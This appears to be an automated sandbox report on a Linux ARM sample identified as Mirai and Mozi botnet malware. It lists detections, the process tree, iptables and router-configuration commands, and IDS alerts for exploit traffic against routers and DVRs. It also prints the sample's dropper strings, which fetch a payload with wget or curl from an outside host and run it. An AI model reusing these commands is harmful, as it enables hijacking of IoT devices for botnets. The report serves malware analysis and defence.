Play interactive tour

Edit tour

Analysis Report MGuvcs6Ocz

Overview

General Information

Sample Name:	MGuvcs6Ocz
Analysis ID:	397466
MD5:	eec5c6c219535fba3a0492ea8118b397
SHA1:	292559e94f1c04b7d0c65d4a01bbbc5dc1ff6f21
SHA256:	12013662c71da69de977c04cd7021f13a70cf7bed4ca6c82acbc100464d4b0ef
Infos:

Detection

Mirai

Score:	100
Range:	0 - 100
Whitelisted:	false

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for dropped file

Multi AV Scanner detection for submitted file

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Yara detected Mirai

Connects to many ports of the same IP (likely port scanning)

Drops files in suspicious directories

Executes the "iptables" command to insert, remove and/or manipulate rules

Found strings indicative of a multi-platform dropper

Opens /proc/net/* files useful for finding connected devices and routers

Sample reads /proc/mounts (often used for finding a writable filesystem)

Sample tries to persist itself using /etc/profile

Sample tries to persist itself using System V runlevels

Terminates several processes with shell command 'killall'

Uses known network protocols on non-standard ports

Detected TCP or UDP traffic on non-standard ports

Enumerates processes within the "proc" file system

Executes commands using a shell command-line interpreter

Executes the "iptables" command used for managing IP filtering and manipulation

HTTP GET or POST without a user agent

Reads system information from the proc file system

Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable

Sample contains strings indicative of password brute-forcing capabilities

Sample contains strings that are potentially command strings

Sample has stripped symbol table

Sample listens on a socket

Sample tries to set the executable flag

Uses the "uname" system call to query kernel version information (possible evasion)

Writes ELF files to disk

Writes HTML files containing JavaScript to disk

Writes shell script files to disk

Yara signature match

Classification

Startup

system is lnxubuntu1

MGuvcs6Ocz (PID: 4582, Parent: 4519, MD5: eec5c6c219535fba3a0492ea8118b397) Arguments: /usr/bin/qemu-arm /tmp/MGuvcs6Ocz

MGuvcs6Ocz New Fork (PID: 4597, Parent: 4582)

MGuvcs6Ocz New Fork (PID: 4599, Parent: 4597)

MGuvcs6Ocz New Fork (PID: 4601, Parent: 4599)

sh (PID: 4601, Parent: 4599, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "killall -9 telnetd utelnetd scfgmgr"

sh New Fork (PID: 4603, Parent: 4601)

killall (PID: 4603, Parent: 4601, MD5: df59c8b62bfcf5b3bd7feaaa2295a9f7) Arguments: killall -9 telnetd utelnetd scfgmgr

MGuvcs6Ocz New Fork (PID: 4620, Parent: 4599)

MGuvcs6Ocz New Fork (PID: 4621, Parent: 4599)

MGuvcs6Ocz New Fork (PID: 4622, Parent: 4599)

MGuvcs6Ocz New Fork (PID: 4635, Parent: 4622)

sh (PID: 4635, Parent: 4622, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I INPUT -p tcp --destination-port 44343 -j ACCEPT"

sh New Fork (PID: 4637, Parent: 4635)

iptables (PID: 4637, Parent: 4635, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I INPUT -p tcp --destination-port 44343 -j ACCEPT

iptables New Fork (PID: 4641, Parent: 4637)

modprobe (PID: 4641, Parent: 4637, MD5: 3d0e6fb594a9ad9c854ace3e507f86c5) Arguments: /sbin/modprobe ip_tables

MGuvcs6Ocz New Fork (PID: 4669, Parent: 4622)

sh (PID: 4669, Parent: 4622, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I OUTPUT -p tcp --source-port 44343 -j ACCEPT"

sh New Fork (PID: 4671, Parent: 4669)

iptables (PID: 4671, Parent: 4669, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I OUTPUT -p tcp --source-port 44343 -j ACCEPT

MGuvcs6Ocz New Fork (PID: 4672, Parent: 4622)

sh (PID: 4672, Parent: 4622, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I PREROUTING -t nat -p tcp --destination-port 44343 -j ACCEPT"

sh New Fork (PID: 4674, Parent: 4672)

iptables (PID: 4674, Parent: 4672, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I PREROUTING -t nat -p tcp --destination-port 44343 -j ACCEPT

MGuvcs6Ocz New Fork (PID: 4706, Parent: 4622)

sh (PID: 4706, Parent: 4622, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I POSTROUTING -t nat -p tcp --source-port 44343 -j ACCEPT"

sh New Fork (PID: 4715, Parent: 4706)

iptables (PID: 4715, Parent: 4706, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I POSTROUTING -t nat -p tcp --source-port 44343 -j ACCEPT

MGuvcs6Ocz New Fork (PID: 4733, Parent: 4622)

sh (PID: 4733, Parent: 4622, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I INPUT -p tcp --dport 44343 -j ACCEPT"

sh New Fork (PID: 4739, Parent: 4733)

iptables (PID: 4739, Parent: 4733, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I INPUT -p tcp --dport 44343 -j ACCEPT

MGuvcs6Ocz New Fork (PID: 4754, Parent: 4622)

sh (PID: 4754, Parent: 4622, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I OUTPUT -p tcp --sport 44343 -j ACCEPT"

sh New Fork (PID: 4758, Parent: 4754)

iptables (PID: 4758, Parent: 4754, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I OUTPUT -p tcp --sport 44343 -j ACCEPT

MGuvcs6Ocz New Fork (PID: 4770, Parent: 4622)

sh (PID: 4770, Parent: 4622, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I PREROUTING -t nat -p tcp --dport 44343 -j ACCEPT"

sh New Fork (PID: 4776, Parent: 4770)

iptables (PID: 4776, Parent: 4770, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I PREROUTING -t nat -p tcp --dport 44343 -j ACCEPT

MGuvcs6Ocz New Fork (PID: 4787, Parent: 4622)

sh (PID: 4787, Parent: 4622, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I POSTROUTING -t nat -p tcp --sport 44343 -j ACCEPT"

sh New Fork (PID: 4795, Parent: 4787)

iptables (PID: 4795, Parent: 4787, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I POSTROUTING -t nat -p tcp --sport 44343 -j ACCEPT

MGuvcs6Ocz New Fork (PID: 4626, Parent: 4599)

MGuvcs6Ocz New Fork (PID: 4631, Parent: 4599)

MGuvcs6Ocz New Fork (PID: 4633, Parent: 4599)

MGuvcs6Ocz New Fork (PID: 4894, Parent: 4599)

sh (PID: 4894, Parent: 4599, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I INPUT -p tcp --destination-port 58000 -j DROP"

sh New Fork (PID: 4898, Parent: 4894)

iptables (PID: 4898, Parent: 4894, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I INPUT -p tcp --destination-port 58000 -j DROP

MGuvcs6Ocz New Fork (PID: 4912, Parent: 4599)

sh (PID: 4912, Parent: 4599, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I OUTPUT -p tcp --source-port 58000 -j DROP"

sh New Fork (PID: 4915, Parent: 4912)

iptables (PID: 4915, Parent: 4912, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I OUTPUT -p tcp --source-port 58000 -j DROP

MGuvcs6Ocz New Fork (PID: 4916, Parent: 4599)

sh (PID: 4916, Parent: 4599, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I INPUT -p tcp --dport 58000 -j DROP"

sh New Fork (PID: 4918, Parent: 4916)

iptables (PID: 4918, Parent: 4916, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I INPUT -p tcp --dport 58000 -j DROP

MGuvcs6Ocz New Fork (PID: 4919, Parent: 4599)

sh (PID: 4919, Parent: 4599, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I OUTPUT -p tcp --sport 58000 -j DROP"

sh New Fork (PID: 4921, Parent: 4919)

iptables (PID: 4921, Parent: 4919, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I OUTPUT -p tcp --sport 58000 -j DROP

MGuvcs6Ocz New Fork (PID: 4923, Parent: 4599)

sh (PID: 4923, Parent: 4599, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "cfgtool set /mnt/jffs2/hw_ctree.xml InternetGatewayDevice.ManagementServer URL \"http://127.0.0.1\""

MGuvcs6Ocz New Fork (PID: 4930, Parent: 4599)

sh (PID: 4930, Parent: 4599, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "cfgtool set /mnt/jffs2/hw_ctree.xml InternetGatewayDevice.ManagementServer ConnectionRequestPassword \"acsMozi\""

MGuvcs6Ocz New Fork (PID: 4940, Parent: 4599)

sh (PID: 4940, Parent: 4599, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I INPUT -p tcp --destination-port 35000 -j DROP"

sh New Fork (PID: 4949, Parent: 4940)

iptables (PID: 4949, Parent: 4940, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I INPUT -p tcp --destination-port 35000 -j DROP

MGuvcs6Ocz New Fork (PID: 4967, Parent: 4599)

sh (PID: 4967, Parent: 4599, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I INPUT -p tcp --destination-port 50023 -j DROP"

sh New Fork (PID: 4975, Parent: 4967)

iptables (PID: 4975, Parent: 4967, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I INPUT -p tcp --destination-port 50023 -j DROP

MGuvcs6Ocz New Fork (PID: 4990, Parent: 4599)

sh (PID: 4990, Parent: 4599, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I OUTPUT -p tcp --source-port 50023 -j DROP"

sh New Fork (PID: 4999, Parent: 4990)

iptables (PID: 4999, Parent: 4990, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I OUTPUT -p tcp --source-port 50023 -j DROP

MGuvcs6Ocz New Fork (PID: 5015, Parent: 4599)

sh (PID: 5015, Parent: 4599, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I OUTPUT -p tcp --source-port 35000 -j DROP"

sh New Fork (PID: 5024, Parent: 5015)

iptables (PID: 5024, Parent: 5015, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I OUTPUT -p tcp --source-port 35000 -j DROP

MGuvcs6Ocz New Fork (PID: 5043, Parent: 4599)

sh (PID: 5043, Parent: 4599, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I INPUT -p tcp --destination-port 7547 -j DROP"

sh New Fork (PID: 5051, Parent: 5043)

iptables (PID: 5051, Parent: 5043, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I INPUT -p tcp --destination-port 7547 -j DROP

MGuvcs6Ocz New Fork (PID: 5067, Parent: 4599)

sh (PID: 5067, Parent: 4599, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I OUTPUT -p tcp --source-port 7547 -j DROP"

sh New Fork (PID: 5077, Parent: 5067)

iptables (PID: 5077, Parent: 5067, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I OUTPUT -p tcp --source-port 7547 -j DROP

MGuvcs6Ocz New Fork (PID: 5095, Parent: 4599)

sh (PID: 5095, Parent: 4599, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I INPUT -p tcp --dport 35000 -j DROP"

sh New Fork (PID: 5103, Parent: 5095)

iptables (PID: 5103, Parent: 5095, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I INPUT -p tcp --dport 35000 -j DROP

MGuvcs6Ocz New Fork (PID: 5119, Parent: 4599)

sh (PID: 5119, Parent: 4599, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I INPUT -p tcp --dport 50023 -j DROP"

sh New Fork (PID: 5124, Parent: 5119)

iptables (PID: 5124, Parent: 5119, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I INPUT -p tcp --dport 50023 -j DROP

MGuvcs6Ocz New Fork (PID: 5126, Parent: 4599)

sh (PID: 5126, Parent: 4599, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I OUTPUT -p tcp --sport 50023 -j DROP"

sh New Fork (PID: 5128, Parent: 5126)

iptables (PID: 5128, Parent: 5126, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I OUTPUT -p tcp --sport 50023 -j DROP

MGuvcs6Ocz New Fork (PID: 5129, Parent: 4599)

sh (PID: 5129, Parent: 4599, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I OUTPUT -p tcp --sport 35000 -j DROP"

sh New Fork (PID: 5131, Parent: 5129)

iptables (PID: 5131, Parent: 5129, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I OUTPUT -p tcp --sport 35000 -j DROP

MGuvcs6Ocz New Fork (PID: 5135, Parent: 4599)

sh (PID: 5135, Parent: 4599, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I INPUT -p tcp --dport 7547 -j DROP"

sh New Fork (PID: 5142, Parent: 5135)

iptables (PID: 5142, Parent: 5135, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I INPUT -p tcp --dport 7547 -j DROP

MGuvcs6Ocz New Fork (PID: 5159, Parent: 4599)

sh (PID: 5159, Parent: 4599, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I OUTPUT -p tcp --sport 7547 -j DROP"

sh New Fork (PID: 5167, Parent: 5159)

iptables (PID: 5167, Parent: 5159, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I OUTPUT -p tcp --sport 7547 -j DROP

MGuvcs6Ocz New Fork (PID: 5218, Parent: 4599)

sh (PID: 5218, Parent: 4599, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I INPUT -p udp --destination-port 7723 -j ACCEPT"

sh New Fork (PID: 5220, Parent: 5218)

iptables (PID: 5220, Parent: 5218, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I INPUT -p udp --destination-port 7723 -j ACCEPT

MGuvcs6Ocz New Fork (PID: 5221, Parent: 4599)

sh (PID: 5221, Parent: 4599, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I OUTPUT -p udp --source-port 7723 -j ACCEPT"

sh New Fork (PID: 5223, Parent: 5221)

iptables (PID: 5223, Parent: 5221, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I OUTPUT -p udp --source-port 7723 -j ACCEPT

MGuvcs6Ocz New Fork (PID: 5227, Parent: 4599)

sh (PID: 5227, Parent: 4599, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I PREROUTING -t nat -p udp --destination-port 7723 -j ACCEPT"

sh New Fork (PID: 5236, Parent: 5227)

iptables (PID: 5236, Parent: 5227, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I PREROUTING -t nat -p udp --destination-port 7723 -j ACCEPT

MGuvcs6Ocz New Fork (PID: 5257, Parent: 4599)

sh (PID: 5257, Parent: 4599, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I POSTROUTING -t nat -p udp --source-port 7723 -j ACCEPT"

sh New Fork (PID: 5267, Parent: 5257)

iptables (PID: 5267, Parent: 5257, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I POSTROUTING -t nat -p udp --source-port 7723 -j ACCEPT

MGuvcs6Ocz New Fork (PID: 5287, Parent: 4599)

sh (PID: 5287, Parent: 4599, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I INPUT -p udp --dport 7723 -j ACCEPT"

sh New Fork (PID: 5295, Parent: 5287)

iptables (PID: 5295, Parent: 5287, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I INPUT -p udp --dport 7723 -j ACCEPT

MGuvcs6Ocz New Fork (PID: 5297, Parent: 4599)

sh (PID: 5297, Parent: 4599, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I OUTPUT -p udp --sport 7723 -j ACCEPT"

sh New Fork (PID: 5299, Parent: 5297)

iptables (PID: 5299, Parent: 5297, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I OUTPUT -p udp --sport 7723 -j ACCEPT

MGuvcs6Ocz New Fork (PID: 5302, Parent: 4599)

sh (PID: 5302, Parent: 4599, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I PREROUTING -t nat -p udp --dport 7723 -j ACCEPT"

sh New Fork (PID: 5309, Parent: 5302)

iptables (PID: 5309, Parent: 5302, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I PREROUTING -t nat -p udp --dport 7723 -j ACCEPT

MGuvcs6Ocz New Fork (PID: 5328, Parent: 4599)

sh (PID: 5328, Parent: 4599, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I POSTROUTING -t nat -p udp --sport 7723 -j ACCEPT"

sh New Fork (PID: 5337, Parent: 5328)

iptables (PID: 5337, Parent: 5328, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I POSTROUTING -t nat -p udp --sport 7723 -j ACCEPT

upstart New Fork (PID: 4813, Parent: 3310)

sh (PID: 4813, Parent: 3310, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -e /proc/self/fd/9

sh New Fork (PID: 4814, Parent: 4813)

date (PID: 4814, Parent: 4813, MD5: 54903b613f9019bfca9f5d28a4fff34e) Arguments: date

sh New Fork (PID: 4815, Parent: 4813)

apport-checkreports (PID: 4815, Parent: 4813, MD5: 1a7d84ebc34df04e55ca3723541f48c9) Arguments: /usr/bin/python3 /usr/share/apport/apport-checkreports --system

upstart New Fork (PID: 4840, Parent: 3310)

sh (PID: 4840, Parent: 3310, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -e /proc/self/fd/9

sh New Fork (PID: 4848, Parent: 4840)

date (PID: 4848, Parent: 4840, MD5: 54903b613f9019bfca9f5d28a4fff34e) Arguments: date

sh New Fork (PID: 4850, Parent: 4840)

apport-gtk (PID: 4850, Parent: 4840, MD5: ec58a49a30ef6a29406a204f28cc7d87) Arguments: /usr/bin/python3 /usr/share/apport/apport-gtk

upstart New Fork (PID: 4867, Parent: 3310)

sh (PID: 4867, Parent: 3310, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -e /proc/self/fd/9

sh New Fork (PID: 4871, Parent: 4867)

date (PID: 4871, Parent: 4867, MD5: 54903b613f9019bfca9f5d28a4fff34e) Arguments: date

sh New Fork (PID: 4877, Parent: 4867)

apport-gtk (PID: 4877, Parent: 4867, MD5: ec58a49a30ef6a29406a204f28cc7d87) Arguments: /usr/bin/python3 /usr/share/apport/apport-gtk

cleanup

Yara Overview

Initial Sample

Source	Rule	Description	Author	Strings
MGuvcs6Ocz	SUSP_XORed_Mozilla	Detects suspicious XORed keyword - Mozilla/5.0	Florian Roth	0x37450:$xo1: oMXKNNC\x0D\x17\x0C\x12 0x374c0:$xo1: oMXKNNC\x0D\x17\x0C\x12 0x37530:$xo1: oMXKNNC\x0D\x17\x0C\x12 0x375a0:$xo1: oMXKNNC\x0D\x17\x0C\x12 0x37610:$xo1: oMXKNNC\x0D\x17\x0C\x12
MGuvcs6Ocz	JoeSecurity_Mirai_8	Yara detected Mirai	Joe Security
MGuvcs6Ocz	JoeSecurity_Mirai_9	Yara detected Mirai	Joe Security
MGuvcs6Ocz	JoeSecurity_Mirai_4	Yara detected Mirai	Joe Security

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
dump.pcap	JoeSecurity_Mirai_4	Yara detected Mirai	Joe Security

Dropped Files

Source	Rule	Description	Author	Strings
/usr/networks	SUSP_XORed_Mozilla	Detects suspicious XORed keyword - Mozilla/5.0	Florian Roth	0x37450:$xo1: oMXKNNC\x0D\x17\x0C\x12 0x374c0:$xo1: oMXKNNC\x0D\x17\x0C\x12 0x37530:$xo1: oMXKNNC\x0D\x17\x0C\x12 0x375a0:$xo1: oMXKNNC\x0D\x17\x0C\x12 0x37610:$xo1: oMXKNNC\x0D\x17\x0C\x12
/usr/networks	JoeSecurity_Mirai_8	Yara detected Mirai	Joe Security
/usr/networks	JoeSecurity_Mirai_9	Yara detected Mirai	Joe Security
/usr/networks	JoeSecurity_Mirai_4	Yara detected Mirai	Joe Security

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Antivirus / Scanner detection for submitted sample

Show sources

Source: MGuvcs6Ocz

Avira: detected

Antivirus detection for dropped file

Show sources

Source: /usr/networks

Avira: detection malicious, Label: LINUX/Mirai.lldau

Multi AV Scanner detection for submitted file

Show sources

Source: MGuvcs6Ocz	Virustotal: Detection: 68%	Perma Link
Source: MGuvcs6Ocz	Metadefender: Detection: 51%	Perma Link
Source: MGuvcs6Ocz	ReversingLabs: Detection: 68%

Spreading:

Found strings indicative of a multi-platform dropper

Show sources

Source: MGuvcs6Ocz	String: >/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;rm -rf i;wget http://%s:%d/i \|\|curl -O http://%s:%d/i \|\|/bin/busybox wget http://%s:%d/i;chmod 777 i \|\|(cp /bin/ls ii;cat i>ii &&rm i;cp ii i;rm ii);./i;/bin/busybox echo -e '%s'
Source: MGuvcs6Ocz	String: >/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;rm -rf i;wget http://%s:%d/bin.sh \|\|curl -O http://%s:%d/bin.sh \|\|/bin/busybox wget http://%s:%d/bin.sh;chmod 777 bin.sh \|\|(cp /bin/ls bix.sh;cat bin.sh>bix.sh;rm bin.sh;cp bix.sh bin.sh;rm bix.sh);sh bin.sh %s;/bin/busybox echo -e '%s'
Source: MGuvcs6Ocz	String: nvalidailedncorrecteniedoodbyebad$ELFshelldvrdvswelcomesuccessmdm96259615-cdpF6connectedBCM#usernamepass>/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;rm -rf i;wget http://%s:%d/i \|\|curl -O http://%s:%d/i \|\|/bin/busybox wget http://%s:%d/i;chmod 777 i \|\|(cp /bin/ls ii;cat i>ii &&rm i;cp ii i;rm ii);./i;/bin/busybox echo -e '%s'

Opens /proc/net/* files useful for finding connected devices and routers

Show sources

Source: /tmp/MGuvcs6Ocz (PID: 4622)	Opens: /proc/net/route			Jump to behavior
Source: /tmp/MGuvcs6Ocz (PID: 4622)	Opens: /proc/net/route			Jump to behavior

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Show sources

Source: Traffic	Snort IDS: 401 ICMP Destination Unreachable Network Unreachable 188.1.231.30: -> 192.168.2.20:
Source: Traffic	Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 93.234.3.129: -> 192.168.2.20:
Source: Traffic	Snort IDS: 486 ICMP Destination Unreachable Communication with Destination Host is Administratively Prohibited 172.255.155.208: -> 192.168.2.20:
Source: Traffic	Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 94.220.101.122: -> 192.168.2.20:
Source: Traffic	Snort IDS: 486 ICMP Destination Unreachable Communication with Destination Host is Administratively Prohibited 154.81.29.141: -> 192.168.2.20:
Source: Traffic	Snort IDS: 2025576 ET EXPLOIT HackingTrio UA (Hello, World) 192.168.2.20:56650 -> 3.22.215.251:80
Source: Traffic	Snort IDS: 2027063 ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) 192.168.2.20:56650 -> 3.22.215.251:80
Source: Traffic	Snort IDS: 2030919 ET TROJAN Mozi Botnet DHT Config Sent 178.175.72.92:8000 -> 192.168.2.20:7723
Source: Traffic	Snort IDS: 2030919 ET TROJAN Mozi Botnet DHT Config Sent 103.91.245.19:5214 -> 192.168.2.20:7723
Source: Traffic	Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 89.56.30.160: -> 192.168.2.20:
Source: Traffic	Snort IDS: 2030919 ET TROJAN Mozi Botnet DHT Config Sent 125.227.149.119:24319 -> 192.168.2.20:7723
Source: Traffic	Snort IDS: 2025576 ET EXPLOIT HackingTrio UA (Hello, World) 192.168.2.20:46712 -> 104.85.180.168:80
Source: Traffic	Snort IDS: 2027063 ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) 192.168.2.20:46712 -> 104.85.180.168:80
Source: Traffic	Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 104.85.180.168:80 -> 192.168.2.20:46712
Source: Traffic	Snort IDS: 2030919 ET TROJAN Mozi Botnet DHT Config Sent 121.132.251.243:6881 -> 192.168.2.20:7723
Source: Traffic	Snort IDS: 2030919 ET TROJAN Mozi Botnet DHT Config Sent 59.99.46.89:4000 -> 192.168.2.20:7723
Source: Traffic	Snort IDS: 2030919 ET TROJAN Mozi Botnet DHT Config Sent 117.192.224.209:1027 -> 192.168.2.20:7723
Source: Traffic	Snort IDS: 486 ICMP Destination Unreachable Communication with Destination Host is Administratively Prohibited 104.218.87.244: -> 192.168.2.20:
Source: Traffic	Snort IDS: 2029215 ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound 192.168.2.20:52888 -> 109.67.247.125:80
Source: Traffic	Snort IDS: 2024916 ET EXPLOIT Netgear DGN Remote Command Execution 192.168.2.20:52888 -> 109.67.247.125:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.20:51496 -> 13.226.101.83:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.20:41804 -> 99.192.234.217:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.20:51496 -> 13.226.101.83:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.20:41804 -> 99.192.234.217:80
Source: Traffic	Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 79.199.60.36: -> 192.168.2.20:
Source: Traffic	Snort IDS: 401 ICMP Destination Unreachable Network Unreachable 31.22.82.187: -> 192.168.2.20:
Source: Traffic	Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 38.122.22.118: -> 192.168.2.20:
Source: Traffic	Snort IDS: 401 ICMP Destination Unreachable Network Unreachable 45.169.165.229: -> 192.168.2.20:
Source: Traffic	Snort IDS: 2025576 ET EXPLOIT HackingTrio UA (Hello, World) 192.168.2.20:45344 -> 61.213.102.33:80
Source: Traffic	Snort IDS: 2027063 ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) 192.168.2.20:45344 -> 61.213.102.33:80
Source: Traffic	Snort IDS: 2020899 ET EXPLOIT D-Link Devices Home Network Administration Protocol Command Execution 192.168.2.20:49960 -> 154.201.250.66:80
Source: Traffic	Snort IDS: 2030919 ET TROJAN Mozi Botnet DHT Config Sent 202.164.139.206:2547 -> 192.168.2.20:7723
Source: Traffic	Snort IDS: 2030919 ET TROJAN Mozi Botnet DHT Config Sent 178.175.72.85:10481 -> 192.168.2.20:7723
Source: Traffic	Snort IDS: 2030919 ET TROJAN Mozi Botnet DHT Config Sent 178.175.58.178:55184 -> 192.168.2.20:7723
Source: Traffic	Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 50.242.148.249: -> 192.168.2.20:
Source: Traffic	Snort IDS: 2030919 ET TROJAN Mozi Botnet DHT Config Sent 178.175.113.174:8081 -> 192.168.2.20:7723
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.20:43006 -> 185.29.123.11:80
Source: Traffic	Snort IDS: 2029215 ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound 192.168.2.20:56722 -> 164.132.9.223:80
Source: Traffic	Snort IDS: 2024916 ET EXPLOIT Netgear DGN Remote Command Execution 192.168.2.20:56722 -> 164.132.9.223:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.20:43006 -> 185.29.123.11:80
Source: Traffic	Snort IDS: 2025884 ET EXPLOIT Multiple CCTV-DVR Vendors RCE 192.168.2.20:47166 -> 121.127.241.108:81
Source: Traffic	Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 124.75.149.185: -> 192.168.2.20:
Source: Traffic	Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 95.248.151.214: -> 192.168.2.20:
Source: Traffic	Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 92.73.215.131: -> 192.168.2.20:
